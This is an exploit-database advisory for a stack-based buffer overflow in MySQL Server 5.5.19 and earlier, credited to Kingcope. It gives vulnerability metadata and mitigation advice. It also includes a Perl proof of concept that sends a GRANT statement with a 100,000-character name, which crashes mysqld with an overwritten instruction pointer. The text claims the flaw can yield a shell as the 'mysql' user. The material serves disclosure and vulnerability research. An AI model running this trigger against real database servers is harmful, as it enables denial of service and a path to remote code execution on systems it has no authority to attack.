MySQL Server exploitable stack based overrun

vendor:

MySQL Server

by:

Kingcope

7,5

CVSS

HIGH

Stack-based buffer overflow

119

CWE

Product Name: MySQL Server

Affected Version From: 5.5.19-log

Affected Version To: 5.1.53-log

Patch Exists: YES

Related CWE: N/A

CPE: a:mysql:mysql_server:5.5.19-log

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2010

MySQL Server exploitable stack based overrun

A stack-based buffer overflow vulnerability exists in MySQL Server versions 5.5.19-log and below (tested with Ver 5.1.53-log for suse-linux-gnu too). An unprivileged user (any account, including anonymous account) can exploit this vulnerability to overwrite the instruction pointer with 0x41414141, which will yield a shell as the user 'mysql' when properly exploited.

Mitigation:

Upgrade to the latest version of MySQL Server.

Source

Exploit-DB raw data:

#!/usr/bin/perl
=for comment

 MySQL Server exploitable stack based overrun
 Ver 5.5.19-log for Linux and below (tested with Ver 5.1.53-log for suse-linux-gnu too)
 unprivileged user (any account (anonymous account?), post auth)
 as illustrated below the instruction pointer is overwritten with 0x41414141
 bug found by Kingcope
 this will yield a shell as the user 'mysql' when properly exploited
 
mysql@linux-lsd2:/root> gdb -c /var/lib/mysql/core
GNU gdb (GDB) SUSE (7.2-3.3)
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i586-suse-linux".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Missing separate debuginfo for the main executable file
Try: zypper install -C "debuginfo(build-id)=768fdbea8f1bf1f7cfb34c7f532f7dd0bdd76803"
[New Thread 8801]
[New Thread 8789]
[New Thread 8793]
[New Thread 8791]
[New Thread 8787]
[New Thread 8790]
[New Thread 8799]
[New Thread 8794]
[New Thread 8792]
[New Thread 8788]
[New Thread 8800]
[New Thread 8786]
[New Thread 8797]
[New Thread 8798]
[New Thread 8785]
[New Thread 8796]
[New Thread 8783]
Core was generated by `/usr/local/mysql/bin/mysqld --log=/tmp/mysqld.log'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb)
=cut

  use strict;
  use DBI();

  # Connect to the database.
  my $dbh = DBI->connect("DBI:mysql:database=test;host=192.168.2.3;",
                         "user", "secret",
                         {'RaiseError' => 1});

  $a ="A" x 100000;
  my $sth = $dbh->prepare("grant file on $a.* to 'user'\@'%' identified by 'secret';");
  $sth->execute();
  
  # Disconnect from the database.
  $dbh->disconnect();